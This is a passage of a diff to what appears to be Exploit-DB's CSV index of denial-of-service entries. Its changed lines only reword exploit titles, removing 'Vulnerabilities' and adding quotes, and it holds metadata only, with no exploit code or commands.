Service",2006-02-17,DrFrancky,linux,dos,0 27253,platforms/linux/dos/27253.txt,"Mozilla Firefox 1.0.x/1.5 - HTML Parsing Denial of Service",2006-02-21,"Yuan Qi",linux,dos,0 -27257,platforms/linux/dos/27257.html,"Mozilla (Multiple Products) - iFrame JavaScript Execution Vulnerabilities",2006-02-22,"Georgi Guninski",linux,dos,0 +27257,platforms/linux/dos/27257.html,"Mozilla (Multiple Products) - iFrame JavaScript Execution",2006-02-22,"Georgi Guninski",linux,dos,0 27258,platforms/asp/dos/27258.txt,"Ipswitch WhatsUp Professional 2006 - Remote Denial of Service",2006-02-22,"Josh Zlatin-Amishav",asp,dos,0 27273,platforms/windows/dos/27273.txt,"TEC-IT TBarCode - OCX ActiveX Control (TBarCode4.ocx 4.1.0) Crash (PoC)",2013-08-02,d3b4g,windows,dos,0 27292,platforms/windows/dos/27292.py,"EchoVNC Viewer - Remote Denial of Service",2013-08-02,Z3r0n3,windows,dos,0 @@ -3529,7 +3529,7 @@ id,file,description,date,author,platform,type,port 27425,platforms/linux/dos/27425.txt,"Zoo 2.10 - Parse.c Local Buffer Overflow",2006-03-16,"Josh Bressers",linux,dos,0 27460,platforms/multiple/dos/27460.pl,"RealNetworks (Multiple Products) - Multiple Buffer Overflow Vulnerabilities",2006-03-23,"Federico L. Bossi Bonin",multiple,dos,0 27474,platforms/multiple/dos/27474.txt,"LibVC - '.VCard' 003 Processing Buffer Overflow",2006-03-21,trew,multiple,dos,0 -27476,platforms/windows/dos/27476.txt,"Microsoft .NET Framework SDK 1.0/1.1 - MSIL Tools Buffer Overflow Vulnerabilities",2006-03-27,"Dinis Cruz",windows,dos,0 +27476,platforms/windows/dos/27476.txt,"Microsoft .NET Framework SDK 1.0/1.1 - MSIL Tools Buffer Overflow",2006-03-27,"Dinis Cruz",windows,dos,0 27727,platforms/windows/dos/27727.txt,"Microsoft Internet Explorer 6 - Nested OBJECT Tag Memory Corruption",2006-04-22,"Michal Zalewski",windows,dos,0 27547,platforms/multiple/dos/27547.txt,"Zdaemon 1.8.1 - Multiple Vulnerabilities",2006-03-31,"Luigi Auriemma",multiple,dos,0 27553,platforms/windows/dos/27553.py,"OneHTTPD 0.7 - Denial of Service",2013-08-13,superkojiman,windows,dos,8080 @@ -3544,7 +3544,7 @@ id,file,description,date,author,platform,type,port 27668,platforms/multiple/dos/27668.c,"Neon Responders 5.4 - Remote Clock Synchronization Denial of Service",2006-04-10,"Stefan Lochbihler",multiple,dos,0 27670,platforms/linux/dos/27670.txt,"Xine 0.9/1.0 - Playlist Handling Remote Format String",2006-04-18,c0ntexb,linux,dos,0 27700,platforms/windows/dos/27700.py,"VideoLAN VLC Media Player 2.0.8 - '.m3u' Local Crash (PoC)",2013-08-19,Asesino04,windows,dos,0 -27714,platforms/osx/dos/27714.txt,"Apple Mac OSX 10.x - LZWDecodeVector (.tiff) Overflow",2006-04-20,"Tom Ferris",osx,dos,0 +27714,platforms/osx/dos/27714.txt,"Apple Mac OSX 10.x - LZWDecodeVector '.tiff' Overflow",2006-04-20,"Tom Ferris",osx,dos,0 27715,platforms/osx/dos/27715.txt,"Apple Mac OSX 10.x - '.zip' BOMStackPop()' Overflow",2006-04-20,"Tom Ferris",osx,dos,0 27723,platforms/linux/dos/27723.txt,"Yukihiro Matsumoto Ruby 1.x - XMLRPC Server Denial of Service",2006-04-21,"Tanaka Akira",linux,dos,0 27730,platforms/multiple/dos/27730.py,"Lotus Domino 7.0.x/8.0/8.5 - LDAP Message Remote Denial of Service",2006-04-24,"Evgeny Legerov",multiple,dos,0 @@ -3643,7 +3643,7 @@ id,file,description,date,author,platform,type,port 28401,platforms/windows/dos/28401.html,"Microsoft Internet Explorer 6 - Visual Studio COM Object Instantiation Denial of Service",2006-08-08,XSec,windows,dos,0 28420,platforms/windows/dos/28420.htm,"Microsoft Windows Server 2000 - Multiple COM Object Instantiation Code Execution Vulnerabilities",2006-08-21,nop,windows,dos,0 28421,platforms/windows/dos/28421.htm,"Microsoft Internet Explorer 6 - Multiple COM Object Color Property Denial of Service Vulnerabilities",2006-08-21,XSec,windows,dos,0 -28463,platforms/windows/dos/28463.html,"SolarWinds Server and Application Monitor - ActiveX (Pepco32c) Buffer Overflow",2013-09-22,blake,windows,dos,0 +28463,platforms/windows/dos/28463.html,"SolarWinds Server and Application Monitor - ActiveX 'Pepco32c' Buffer Overflow",2013-09-22,blake,windows,dos,0 28451,platforms/windows/dos/28451.txt,"Share KM 1.0.19 - Remote Denial of Service",2013-09-22,"Yuda Prawira",windows,dos,0 28469,platforms/windows/dos/28469.txt,"Internet Security Systems 3.6 BlackICE - Local Denial of Service",2006-09-01,"David Matousek",windows,dos,0 28491,platforms/multiple/dos/28491.txt,"DSocks 1.3 - 'Name' Buffer Overflow",2006-09-05,"Michael Adams",multiple,dos,0 @@ -3725,7 +3725,7 @@ id,file,description,date,author,platform,type,port 29502,platforms/multiple/dos/29502.html,"Transmit 3.5.5 - Remote Heap Overflow",2007-01-20,LMH,multiple,dos,0 29503,platforms/windows/dos/29503.py,"KarjaSoft Sami HTTP Server 1.0.4/1.0.5/2.0.1 - Request Remote Denial of Service",2007-01-22,shinnai,windows,dos,0 29509,platforms/osx/dos/29509.txt,"Apple Mac OSX 10.4.8 - QuickDraw GetSrcBits32ARGB Remote Memory Corruption",2007-01-23,LMH,osx,dos,0 -30046,platforms/windows/dos/30046.py,"Computer Associates BrightStor ARCserve Backup 11.5 - mediasvr caloggerd Denial of Service Vulnerabilities",2007-05-16,"M. Shirk",windows,dos,0 +30046,platforms/windows/dos/30046.py,"Computer Associates BrightStor ARCserve Backup 11.5 - mediasvr caloggerd Denial of Service",2007-05-16,"M. Shirk",windows,dos,0 30020,platforms/linux/dos/30020.txt,"MySQL 5.0.x - IF Query Handling Remote Denial of Service",2013-12-04,"Neil Kettle",linux,dos,0 30023,platforms/windows/dos/30023.txt,"Progress OpenEdge 10b - Multiple Denial of Service Vulnerabilities",2007-05-11,"Eelko Neven",windows,dos,0 30024,platforms/linux/dos/30024.txt,"LibEXIF 0.6.x - Exif_Data_Load_Data_Entry Remote Integer Overflow",2007-05-11,"Victor Stinner",linux,dos,0 @@ -3777,7 +3777,7 @@ id,file,description,date,author,platform,type,port 29787,platforms/windows/dos/29787.py,"HP JetDirect FTP Print Server - RERT Command Denial of Service",2007-01-18,Handrix,windows,dos,0 30110,platforms/linux/dos/30110.c,"Bochs 2.3 - Buffer Overflow / Denial of Service",2007-05-31,"Tavis Ormandy",linux,dos,0 30139,platforms/multiple/dos/30139.c,"Agnitum Outpost Firewall 4.0 - Outpost_IPC_HDR Local Denial of Service",2007-06-04,"Matousec Transparent security",multiple,dos,0 -30160,platforms/windows/dos/30160.txt,"Microsoft Windows XP - GDI+ ICO File Remote Denial of Service",2007-06-06,"Dennis Rand",windows,dos,0 +30160,platforms/windows/dos/30160.txt,"Microsoft Windows XP - GDI+ '.ICO' File Remote Denial of Service",2007-06-06,"Dennis Rand",windows,dos,0 30163,platforms/multiple/dos/30163.html,"Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow",2007-06-08,"Dennis Rand",multiple,dos,0 30167,platforms/hardware/dos/30167.txt,"Packeteer PacketShaper 7.x - Web Interface Remote Denial of Service",2007-06-08,nnposter,hardware,dos,0 29800,platforms/windows/dos/29800.py,"Microsoft Internet Explorer 7 - HTML Denial of Service",2007-03-28,shinnai,windows,dos,0 @@ -3788,7 +3788,7 @@ id,file,description,date,author,platform,type,port 29816,platforms/windows/dos/29816.c,"FastStone Image Viewer 2.9/3.6 - '.bmp' Image Handling Memory Corruption",2007-04-04,"Ivan Fratric",windows,dos,0 29818,platforms/windows/dos/29818.c,"ACDSee 9.0 Photo Manager - Multiple '.BMP' Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 29819,platforms/windows/dos/29819.c,"IrfanView 3.99 - Multiple .BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 -29823,platforms/php/dos/29823.c,"PHP 5.2.1 'GD' Extension - '.WBMP' File Integer Overflow Vulnerabilities",2007-04-07,"Ivan Fratric",php,dos,0 +29823,platforms/php/dos/29823.c,"PHP 5.2.1 'GD' Extension - '.WBMP' File Integer Overflow",2007-04-07,"Ivan Fratric",php,dos,0 29826,platforms/linux/dos/29826.txt,"Linux Kernel 2.6.x - AppleTalk ATalk_Sum_SKB Function Denial of Service",2007-04-09,"Jean Delvare",linux,dos,0 29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 - Hostname Remote Buffer Overflow",2007-04-30,"Thomas Pollet",windows,dos,0 29850,platforms/windows/dos/29850.txt,"eIQnetworks Enterprise Security Analyzer 2.5 - Multiple Buffer Overflow Vulnerabilities",2007-04-12,"Leon Juranic",windows,dos,0 @@ -3817,7 +3817,7 @@ id,file,description,date,author,platform,type,port 30233,platforms/windows/dos/30233.pl,"LiteWEB Web Server 2.7 - Invalid Page Remote Denial of Service",2007-06-25,Prili,windows,dos,0 30251,platforms/linux/dos/30251.c,"GD Graphics Library 2.0.34 - 'libgd' gdImageCreateXbm Function Unspecified Denial of Service",2007-06-26,anonymous,linux,dos,0 30252,platforms/windows/dos/30252.py,"Conti FTP Server 1.0 - Large String Denial of Service",2007-06-27,35c666,windows,dos,0 -30255,platforms/windows/dos/30255.txt,"PC SOFT WinDEV 11 - WDP File Parsing Stack Buffer Overflow",2007-06-28,"Jerome Athias",windows,dos,0 +30255,platforms/windows/dos/30255.txt,"PC SOFT WinDEV 11 - '.WDP' File Parsing Stack Buffer Overflow",2007-06-28,"Jerome Athias",windows,dos,0 40743,platforms/windows/dos/40743.html,"VBScript 5.8.7600.16385/5.8.9600.16384 - RegExpComp::PnodeParse Out-of-Bounds Read",2016-11-09,Skylined,windows,dos,0 30308,platforms/windows/dos/30308.py,"PotPlayer 1.5.42509 Beta - Integer Division by Zero Denial of Service",2013-12-15,sajith,windows,dos,0 30314,platforms/windows/dos/30314.txt,"Yahoo! Messenger 8.1 - Address Book Remote Buffer Overflow",2007-07-16,"Rajesh Sethumadhavan",windows,dos,0 @@ -3882,7 +3882,7 @@ id,file,description,date,author,platform,type,port 30744,platforms/linux/dos/30744.txt,"MySQL 5.1.23 - Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial of Service",2007-11-05,"Joe Gallo",linux,dos,0 30749,platforms/windows/dos/30749.html,"Microsoft Office 2003 - Web Component Memory Access Violation Denial of Service",2007-11-12,"Elazar Broad",windows,dos,0 30753,platforms/php/dos/30753.txt,"AutoIndex PHP Script 2.2.2/2.2.3 - 'index.php' Denial of Service",2007-11-12,L4teral,php,dos,0 -30756,platforms/windows/dos/30756.html,"Microsoft Forms 2.0 - ActiveX Control 2.0 Memory Access Violation Denial of Service Vulnerabilities",2007-11-12,"Elazar Broad",windows,dos,0 +30756,platforms/windows/dos/30756.html,"Microsoft Forms 2.0 - ActiveX Control 2.0 Memory Access Violation Denial of Service",2007-11-12,"Elazar Broad",windows,dos,0 30760,platforms/php/dos/30760.txt,"PHP 5.2.5 - Multiple GetText functions Denial of Service Vulnerabilities",2007-11-13,"laurent gaffie",php,dos,0 30761,platforms/windows/dos/30761.html,"WebEx GPCContainer - Memory Access Violation Multiple Denial of Service Vulnerabilities",2007-11-13,"Elazar Broad",windows,dos,0 30763,platforms/linux/dos/30763.php,"KDE Konqueror 3.5.6 - Cookie Handling Denial of Service",2007-11-14,"laurent gaffie",linux,dos,0 @@ -3914,7 +3914,7 @@ id,file,description,date,author,platform,type,port 30936,platforms/windows/dos/30936.html,"AOL Picture Editor 'YGPPicEdit.dll' ActiveX Control 9.5.1.8 - Multiple Buffer Overflow Vulnerabilities",2007-12-25,"Elazar Broad",windows,dos,0 30942,platforms/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 - 'oxm.c' / 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",linux,dos,0 30943,platforms/multiple/dos/30943.txt,"Libnemesi 0.6.4-rc1 - Multiple Remote Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,dos,0 -30985,platforms/linux/dos/30985.txt,"libcdio 0.7x - GNU Compact Disc Input and Control Library Buffer Overflow Vulnerabilities",2007-12-30,"Devon Miller",linux,dos,0 +30985,platforms/linux/dos/30985.txt,"libcdio 0.7x - GNU Compact Disc Input and Control Library Buffer Overflow",2007-12-30,"Devon Miller",linux,dos,0 30989,platforms/multiple/dos/30989.txt,"Pragma Systems FortressSSH 5.0 - 'msvcrt.dll' Exception Handling Remote Denial of Service",2008-01-04,"Luigi Auriemma",multiple,dos,0 30990,platforms/multiple/dos/30990.txt,"Foxit WAC Server 2.0 Build 3503 - Denial of Service",2008-01-04,"Luigi Auriemma",multiple,dos,0 30991,platforms/multiple/dos/30991.txt,"Pragma TelnetServer 7.0.4.589 - NULL-Pointer Dereference Denial of Service",2008-01-04,"Luigi Auriemma",multiple,dos,0 @@ -4009,7 +4009,7 @@ id,file,description,date,author,platform,type,port 31761,platforms/linux/dos/31761.txt,"Embedthis Goahead WebServer 3.1.3-0 - Multiple Vulnerabilities",2014-02-19,"Maksymilian Motyl",linux,dos,80 31762,platforms/windows/dos/31762.py,"Catia V5-6R2013 - 'CATV5_AllApplications' Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",windows,dos,55555 31763,platforms/windows/dos/31763.py,"SolidWorks Workgroup PDM 2014 SP2 Opcode 2001 - Denial of Service",2014-02-19,"Mohamed Shetta",windows,dos,30000 -31785,platforms/multiple/dos/31785.txt,"Multiple Platform IPv6 Address Publication - Denial of Service Vulnerabilities",2008-05-13,"Tyler Reguly",multiple,dos,0 +31785,platforms/multiple/dos/31785.txt,"Multiple Platform IPv6 Address Publication - Denial of Service",2008-05-13,"Tyler Reguly",multiple,dos,0 31791,platforms/windows/dos/31791.py,"Catia V5-6R2013 - 'CATV5_Backbone_Bus' Stack Buffer Overflow",2014-02-20,"Mohamed Shetta",windows,dos,55555 40849,platforms/windows/dos/40849.py,"Xitami Web Server 5.0a0 - Denial of Service",2016-11-30,sm,windows,dos,0 31815,platforms/linux/dos/31815.html,"libxslt XSL 1.1.23 - File Processing Buffer Overflow",2008-05-21,"Anthony de Almeida Lopes",linux,dos,0 @@ -4060,7 +4060,7 @@ id,file,description,date,author,platform,type,port 32194,platforms/multiple/dos/32194.txt,"Noticeware Email Server 4.6 - NG LOGIN Messages Denial of Service",2008-08-06,Antunes,multiple,dos,0 32195,platforms/multiple/dos/32195.txt,"Qbik WinGate 6.2.2 - LIST Command Remote Denial of Service",2008-08-08,Antunes,multiple,dos,0 32208,platforms/multiple/dos/32208.txt,"Oracle VM VirtualBox - 3D Acceleration Multiple Vulnerabilities",2014-03-12,"Core Security",multiple,dos,0 -32222,platforms/multiple/dos/32222.rb,"Ruby 1.9 - WEBrick::HTTP::DefaultFileHandler Crafted HTTP Request Denial of Service",2008-08-11,"Keita Yamaguchi",multiple,dos,0 +32222,platforms/multiple/dos/32222.rb,"Ruby 1.9 - 'WEBrick::HTTP::DefaultFileHandler' Crafted HTTP Request Denial of Service",2008-08-11,"Keita Yamaguchi",multiple,dos,0 32229,platforms/windows/dos/32229.txt,"hMAilServer 4.4.1 - IMAP Command Remote Denial of Service",2008-08-12,Antunes,windows,dos,0 32248,platforms/linux/dos/32248.txt,"Yelp 2.23.1 - Invalid URI Format String",2008-08-13,"Aaron Grattafiori",linux,dos,0 32256,platforms/windows/dos/32256.py,"Ipswitch WS_FTP Home/Professional 8.0 - WS_FTP Client Format String",2008-08-17,securfrog,windows,dos,0 @@ -4130,14 +4130,14 @@ id,file,description,date,author,platform,type,port 32749,platforms/linux/dos/32749.txt,"Pidgin 2.4.2 - 'msn_slplink_process_msg()' Denial of Service",2009-01-26,"Juan Pablo Lopez Yacubian",linux,dos,0 32754,platforms/osx/dos/32754.c,"Apple Mac OSX 10.9 - Hard Link Memory Corruption",2014-04-08,"Maksymilian Arciemowicz",osx,dos,0 32755,platforms/windows/dos/32755.c,"WFTPD Pro 3.30 - Multiple Command Remote Denial of Service Vulnerabilities",2009-01-26,LiquidWorm,windows,dos,0 -32761,platforms/windows/dos/32761.pl,"Apple Safari For Windows 3.2.1 - Malformed URI Remote Denial of Service",2009-01-27,Lostmon,windows,dos,0 +32761,platforms/windows/dos/32761.pl,"Apple Safari For Windows 3.2.1 - URI Remote Denial of Service",2009-01-27,Lostmon,windows,dos,0 32769,platforms/php/dos/32769.php,"PHP 5.2.5 - 'mbstring.func_overload' WebServer Denial of Service",2009-01-30,strategma,php,dos,0 32772,platforms/windows/dos/32772.py,"Nokia MultiMedia Player 1.1 - '.m3u' Heap Buffer Overflow",2009-02-03,zer0in,windows,dos,0 32774,platforms/multiple/dos/32774.txt,"QIP 2005 - Malformed Rich Text Message Remote Denial of Service",2009-02-04,ShineShadow,multiple,dos,0 32775,platforms/linux/dos/32775.txt,"Linux Kernel 2.6.x - 'make_indexed_dir()' Local Denial of Service",2009-02-16,"Sami Liedes",linux,dos,0 32800,platforms/linux/dos/32800.txt,"Poppler 0.10.3 - Denial of Service",2009-02-12,Romario,linux,dos,0 32815,platforms/linux/dos/32815.c,"Linux Kernel 2.6.x - Cloned Process 'CLONE_PARENT' Local Origin Validation",2009-02-25,"Chris Evans",linux,dos,0 -32817,platforms/osx/dos/32817.txt,"Apple Safari 4 - Malformed 'feeds:' URI Null Pointer Dereference Remote Denial of Service",2009-02-25,Trancer,osx,dos,0 +32817,platforms/osx/dos/32817.txt,"Apple Safari 4 - 'feeds:' URI Null Pointer Dereference Remote Denial of Service",2009-02-25,Trancer,osx,dos,0 32824,platforms/windows/dos/32824.pl,"Internet Download Manager 5.15 Build 3 - Language File Parsing Buffer Overflow",2009-02-27,"musashi karak0rsan",windows,dos,0 32836,platforms/multiple/dos/32836.html,"Mozilla Firefox 2.0.x - Nested 'window.print()' Denial of Service",2009-03-03,b3hz4d,multiple,dos,0 32838,platforms/linux/dos/32838.txt,"MySQL 6.0.9 - XPath Expression Remote Denial of Service",2009-02-14,"Shane Bester",linux,dos,0 @@ -4274,7 +4274,7 @@ id,file,description,date,author,platform,type,port 33735,platforms/multiple/dos/33735.txt,"SUPERAntiSpyware 4.34.1000 and SuperAdBlocker 4.6.1000 - Multiple Vulnerabilities",2010-03-10,"Luka Milkovic",multiple,dos,0 33737,platforms/hardware/dos/33737.py,"ZTE / TP-Link RomPager - Denial of Service",2014-06-13,"Osanda Malith",hardware,dos,0 33755,platforms/php/dos/33755.php,"PHP 5.3.2 'xmlrpc' Extension - Multiple Remote Denial of Service Vulnerabilities",2010-03-12,"Auke van Slooten",php,dos,0 -33770,platforms/windows/dos/33770.txt,"Microsoft Windows Media Player 11 - .AVI File Colorspace Conversion Remote Memory Corruption",2010-03-17,ITSecTeam,windows,dos,0 +33770,platforms/windows/dos/33770.txt,"Microsoft Windows Media Player 11 - '.AVI' File Colorspace Conversion Remote Memory Corruption",2010-03-17,ITSecTeam,windows,dos,0 33775,platforms/windows/dos/33775.py,"Xilisoft Video Converter Wizard - '.yuv' Stack Buffer Overflow",2010-03-19,ITSecTeam,windows,dos,0 33778,platforms/windows/dos/33778.pl,"Remote Help HTTP 0.0.7 - GET Format String Denial of Service",2010-03-20,Rick2600,windows,dos,0 33800,platforms/multiple/dos/33800.html,"Mozilla Firefox 3.6 - 'gfxTextRun::SanitizeGlyphRuns()' Remote Memory Corruption",2010-03-24,"Jesse Ruderman",multiple,dos,0 @@ -4312,7 +4312,7 @@ id,file,description,date,author,platform,type,port 34094,platforms/windows/dos/34094.pl,"Aqua Real Screensaver - '.ar' Buffer Overflow",2010-01-15,R3d-D3V!L,windows,dos,0 34340,platforms/multiple/dos/34340.txt,"Unreal Engine - 'ReceivedRawBunch()' Denial of Service",2010-07-15,"Luigi Auriemma",multiple,dos,0 34129,platforms/windows/dos/34129.txt,"World Of Warcraft 3.3.5a - 'macros-cache.txt' Stack Overflow",2014-07-21,"Alireza Chegini",windows,dos,0 -34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 (mod_status) - Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0 +34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 mod_status - Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0 34135,platforms/windows/dos/34135.py,"DjVuLibre 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0 34158,platforms/windows/dos/34158.txt,"Chrome Engine 4 - Denial of Service",2010-06-17,"Luigi Auriemma",windows,dos,0 34151,platforms/windows/dos/34151.txt,"Adobe SVG Viewer 3.0 - Circle Transform Remote Code Execution",2010-06-16,h07,windows,dos,0 @@ -4417,7 +4417,7 @@ id,file,description,date,author,platform,type,port 35358,platforms/php/dos/35358.txt,"PHP 5.5.12 - Locale::parseLocale Memory Corruption",2014-11-24,"John Leitch",php,dos,0 35359,platforms/multiple/dos/35359.txt,"tcpdump 4.6.2 - Geonet Decoder Denial of Service",2014-11-24,"Steffen Bauch",multiple,dos,0 35363,platforms/windows/dos/35363.txt,"TRENDnet SecurView Wireless Network Camera TV-IP422WN - 'UltraCamX.ocx' Stack Buffer Overflow",2014-11-25,LiquidWorm,windows,dos,0 -35369,platforms/multiple/dos/35369.txt,"Battlefield 2/2142 - Malformed Packet Null Pointer Dereference Remote Denial of Service",2011-02-22,"Luigi Auriemma",multiple,dos,0 +35369,platforms/multiple/dos/35369.txt,"Battlefield 2/2142 - Packet Null Pointer Dereference Remote Denial of Service",2011-02-22,"Luigi Auriemma",multiple,dos,0 35379,platforms/windows/dos/35379.go,"Elipse E3 - HTTP Denial of Service",2014-11-26,firebitsbr,windows,dos,80 35382,platforms/android/dos/35382.txt,"Android WAPPushManager - SQL Injection",2014-11-26,"Baidu X-Team",android,dos,0 35403,platforms/linux/dos/35403.c,"Linux Kernel 2.6.x - epoll Nested Structures Local Denial of Service",2011-03-02,"Nelson Elhage",linux,dos,0 @@ -4503,8 +4503,8 @@ id,file,description,date,author,platform,type,port 36288,platforms/multiple/dos/36288.php,"Libc - 'regcomp()' Stack Exhaustion Denial of Service",2011-11-04,"Maksymilian Arciemowicz",multiple,dos,0 36300,platforms/windows/dos/36300.py,"Kool Media Converter 2.6.0 - '.ogg' File Buffer Overflow",2011-11-11,swami,windows,dos,0 36309,platforms/hardware/dos/36309.py,"Sagem F@st 3304-V2 - Telnet Crash (PoC)",2015-03-08,"Loudiyi Mohamed",hardware,dos,0 -36334,platforms/windows/dos/36334.txt,"Foxit Products GIF Conversion - Memory Corruption (LZWMinimumCodeSize)",2015-03-11,"Francis Provencher",windows,dos,0 -36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion - Memory Corruption (DataSubBlock)",2015-03-11,"Francis Provencher",windows,dos,0 +36334,platforms/windows/dos/36334.txt,"Foxit Products GIF Conversion - 'LZWMinimumCodeSize' Memory Corruption",2015-03-11,"Francis Provencher",windows,dos,0 +36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion - 'DataSubBlock' Memory Corruption",2015-03-11,"Francis Provencher",windows,dos,0 36336,platforms/windows/dos/36336.txt,"Microsoft Windows - Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",windows,dos,0 36361,platforms/windows/dos/36361.py,"Titan FTP Server 8.40 - 'APPE' Remote Denial of Service",2011-11-25,"Houssam Sahli",windows,dos,0 36377,platforms/multiple/dos/36377.txt,"CoDeSys 3.4 - POST Null Pointer Content-Length Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos,0 @@ -4577,7 +4577,7 @@ id,file,description,date,author,platform,type,port 37326,platforms/windows/dos/37326.py,"WinylPlayer 3.0.3 - Memory Corruption (PoC)",2015-06-19,"Rajganesh Pandurangan",windows,dos,0 37327,platforms/windows/dos/37327.py,"HansoPlayer 3.4.0 - Memory Corruption (PoC)",2015-06-19,"Rajganesh Pandurangan",windows,dos,0 37343,platforms/windows/dos/37343.py,"Seagate Dashboard 4.0.21.0 - Crash (PoC)",2015-06-23,HexTitan,windows,dos,0 -37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 - '.gif' Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)",2015-06-23,"Francis Provencher",windows,dos,0 +37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 - '.gif' Conversion Heap Memory Corruption 'LZWMinimumCodeSize'",2015-06-23,"Francis Provencher",windows,dos,0 37347,platforms/windows/dos/37347.txt,"Photoshop CC2014 / Bridge CC 2014 - '.gif' Parsing Memory Corruption",2015-06-23,"Francis Provencher",windows,dos,0 37348,platforms/windows/dos/37348.txt,"Photoshop CC2014 / Bridge CC 2014 - '.png' Parsing Memory Corruption",2015-06-23,"Francis Provencher",windows,dos,0 37386,platforms/osx/dos/37386.php,"Apple Mac OSX 10.10.3 (Yosemite) Safari 8.0.x - Crash (PoC)",2015-06-26,"Mohammad Reza Espargham",osx,dos,0 @@ -4651,7 +4651,7 @@ id,file,description,date,author,platform,type,port 37855,platforms/multiple/dos/37855.txt,"Adobe Flash - Setting Value Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 37856,platforms/windows/dos/37856.txt,"Adobe Flash - '.SWF' Out-of-Bounds Memory Read (1)",2015-08-19,"Google Security Research",windows,dos,0 37857,platforms/windows/dos/37857.txt,"Adobe Flash - '.SWF' Out-of-Bounds Memory Read (2)",2015-08-19,"Google Security Research",windows,dos,0 -37858,platforms/windows/dos/37858.txt,"Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated TTF File Embedded in SWF",2015-08-19,"Google Security Research",windows,dos,0 +37858,platforms/windows/dos/37858.txt,"Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated '.TTF' File Embedded in SWF",2015-08-19,"Google Security Research",windows,dos,0 37859,platforms/multiple/dos/37859.txt,"Adobe Flash - XML.childNodes Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 37860,platforms/windows/dos/37860.txt,"Adobe Flash AS2 - Color.setRGB Use-After-Free",2015-08-19,bilou,windows,dos,0 37861,platforms/windows/dos/37861.txt,"Adobe Flash AS2 - DisplacementMapFilter.mapBitmap Use-After-Free (2)",2015-08-19,bilou,windows,dos,0 @@ -4672,7 +4672,7 @@ id,file,description,date,author,platform,type,port 37876,platforms/lin_x86-64/dos/37876.txt,"Adobe Flash - XMLSocket Destructor Not Cleared Before Setting User Data in connect",2015-08-19,"Google Security Research",lin_x86-64,dos,0 37877,platforms/multiple/dos/37877.txt,"Adobe Flash - textfield.gridFitType Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 37878,platforms/multiple/dos/37878.txt,"Adobe Flash - FileReference Class Type Confusion",2015-08-19,"Google Security Research",multiple,dos,0 -37879,platforms/lin_x86-64/dos/37879.txt,"Adobe Flash - Heap Based Buffer Overflow Loading FLV File with Nellymoser Audio Codec",2015-08-19,"Google Security Research",lin_x86-64,dos,0 +37879,platforms/lin_x86-64/dos/37879.txt,"Adobe Flash - Heap Based Buffer Overflow Loading '.FLV' File with Nellymoser Audio Codec",2015-08-19,"Google Security Research",lin_x86-64,dos,0 37880,platforms/lin_x86-64/dos/37880.txt,"Adobe Flash - Heap Based Buffer Overflow Due to Indexing Error When Loading FLV File",2015-08-19,"Google Security Research",lin_x86-64,dos,0 37881,platforms/win_x86/dos/37881.txt,"Adobe Flash - Shared Object Type Confusion",2015-08-19,"Google Security Research",win_x86,dos,0 37882,platforms/multiple/dos/37882.txt,"Adobe Flash - Overflow in ID3 Tag Parsing",2015-08-19,"Google Security Research",multiple,dos,0 @@ -4727,7 +4727,7 @@ id,file,description,date,author,platform,type,port 38121,platforms/php/dos/38121.txt,"PHP GMP - 'unserialize()' Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 38122,platforms/php/dos/38122.txt,"PHP 5.4/5.5/5.6 - SplObjectStorage 'Unserialize()' Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 38123,platforms/php/dos/38123.txt,"PHP Session Deserializer - Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 -38125,platforms/php/dos/38125.txt,"PHP 5.4/5.5/5.6 - 'Unserialize()' Use-After-Free Vulnerabilities",2015-09-09,"Taoguang Chen",php,dos,0 +38125,platforms/php/dos/38125.txt,"PHP 5.4/5.5/5.6 - 'Unserialize()' Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 38132,platforms/linux/dos/38132.py,"Linux Kernel 3.3.5 - Btrfs CRC32C feature Infinite Loop Local Denial of Service",2012-12-13,"Pascal Junod",linux,dos,0 38145,platforms/linux/dos/38145.txt,"OpenLDAP 2.4.42 - ber_get_next Denial of Service",2015-09-11,"Denis Andzakovic",linux,dos,389 38146,platforms/windows/dos/38146.html,"Microsoft Internet Explorer 11 - Stack Underflow Crash (PoC)",2015-09-11,Mjx,windows,dos,0 @@ -4879,12 +4879,12 @@ id,file,description,date,author,platform,type,port 38994,platforms/multiple/dos/38994.txt,"Wireshark - wmem_alloc Assertion Failure",2015-12-16,"Google Security Research",multiple,dos,0 38995,platforms/multiple/dos/38995.txt,"Wireshark - dissect_zcl_pwr_prof_pwrprofstatersp Static Out-of-Bounds Read",2015-12-16,"Google Security Research",multiple,dos,0 38996,platforms/multiple/dos/38996.txt,"Wireshark - dissct_rsl_ipaccess_msg Static Out-of-Bounds Read",2015-12-16,"Google Security Research",multiple,dos,0 -38997,platforms/multiple/dos/38997.txt,"Wireshark - file_read (wtap_read_bytes_or_eof/mp2t_find_next_pcr) Stack Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos,0 -38998,platforms/multiple/dos/38998.txt,"Wireshark - memcpy (get_value / 